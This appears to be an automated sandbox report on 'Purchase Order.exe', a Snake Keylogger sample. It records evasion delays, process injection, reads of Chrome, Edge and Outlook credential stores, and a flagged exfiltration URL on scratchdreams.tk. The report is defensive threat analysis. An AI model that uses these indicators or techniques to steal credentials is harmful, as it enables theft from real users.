Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -592517s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -592374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -592266s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597874	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596967	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596857	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596377	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595768	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595558	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593797	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593514	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593406	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593297	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593188	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593063	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 592938	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 592813	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 592688	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 592517	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 592374	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 592266	Jump to behavior

Source: Purchase Order.exe, 00000008.00000002.3804292957.00000000010F6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Purchase Order.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Purchase Order.exe

Memory written: C:\Users\user\Desktop\Purchase Order.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 3.2.Purchase Order.exe.378b300.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Purchase Order.exe.37abb20.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3808084232.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3808084232.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 7192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 7692, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Purchase Order.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Purchase Order.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 3.2.Purchase Order.exe.378b300.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Purchase Order.exe.37abb20.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 7192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 7692, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 3.2.Purchase Order.exe.378b300.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Purchase Order.exe.37abb20.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3808084232.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3808084232.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 7192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 7692, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Purchase Order.exe	32%	ReversingLabs	Win32.Trojan.Generic
Purchase Order.exe	36%	Virustotal		Browse
Purchase Order.exe	100%	Avira	HEUR/AGEN.1309278
Purchase Order.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
reallyfreegeoip.org	1%	Virustotal	Browse
scratchdreams.tk	6%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
http://www.microsoft.cJ	0%	Avira URL Cloud	safe
https://scratchdreams.tk	100%	Avira URL Cloud	malware
https://scratchdreams.tk/_send_.php?TS	100%	Avira URL Cloud	malware
http://scratchdreams.tk	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/102.129.152.231$	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/102.129.152.231	0%	Avira URL Cloud	safe
http://scratchdreams.tk	6%	Virustotal		Browse
https://scratchdreams.tk/_send_.php?TS	1%	Virustotal		Browse
https://scratchdreams.tk	15%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.199.225	true	false		high
reallyfreegeoip.org	172.67.177.134	true	false	1%, Virustotal, Browse	unknown
scratchdreams.tk	104.21.27.85	true	false	6%, Virustotal, Browse	unknown
checkip.dyndns.com	158.101.44.242	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://scratchdreams.tk/_send_.php?TS	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/102.129.152.231	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://us2.smtp.mailhostbox.com	Purchase Order.exe, 00000008.00000002.3808084232.0000000003232000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.cJ	Purchase Order.exe, 00000008.00000002.3811063229.0000000006750000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	Purchase Order.exe, 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://scratchdreams.tk	Purchase Order.exe, 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://reallyfreegeoip.org	Purchase Order.exe, 00000008.00000002.3808084232.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003031000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	Purchase Order.exe, 00000008.00000002.3808084232.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003019000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.000000000305C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	Purchase Order.exe, 00000008.00000002.3808084232.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.000000000300D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003019000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.000000000305C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	Purchase Order.exe, 00000008.00000002.3808084232.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003019000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Purchase Order.exe, 00000008.00000002.3808084232.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/102.129.152.231$	Purchase Order.exe, 00000008.00000002.3808084232.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.000000000305C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://scratchdreams.tk	Purchase Order.exe, 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/	Purchase Order.exe, 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.0000000003019000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.91.199.225	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
104.21.27.85	scratchdreams.tk	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1420681
Start date and time:	2024-04-05 08:20:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Purchase Order.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 121 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Purchase Order.exe, PID 7692 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:21:07	API Interceptor	9735773x Sleep call for process: Purchase Order.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.91.199.225	Solicitud de cotizacion.exe	Get hash	malicious	AgentTesla	Browse
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.27067.30548.exe	Get hash	malicious	AgentTesla	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse
	Quotation - HDPE Fittings.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse
	FedEx_773099516146.exe	Get hash	malicious	AgentTesla	Browse
	FedEx_ 239071091.exe	Get hash	malicious	AgentTesla	Browse
158.101.44.242	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	Hitomi Downloader.exe	Get hash	malicious	Agent Tesla, AgentTesla, RisePro Stealer	Browse	checkip.dyndns.org/
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ATM Dekont E-Maili pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	Halkbank_Ekstre_20240312_081829_752731.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Contract.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	Q88 09284823910.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	lO6Cysph34.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Bq4jHI36wz.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
172.67.177.134	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
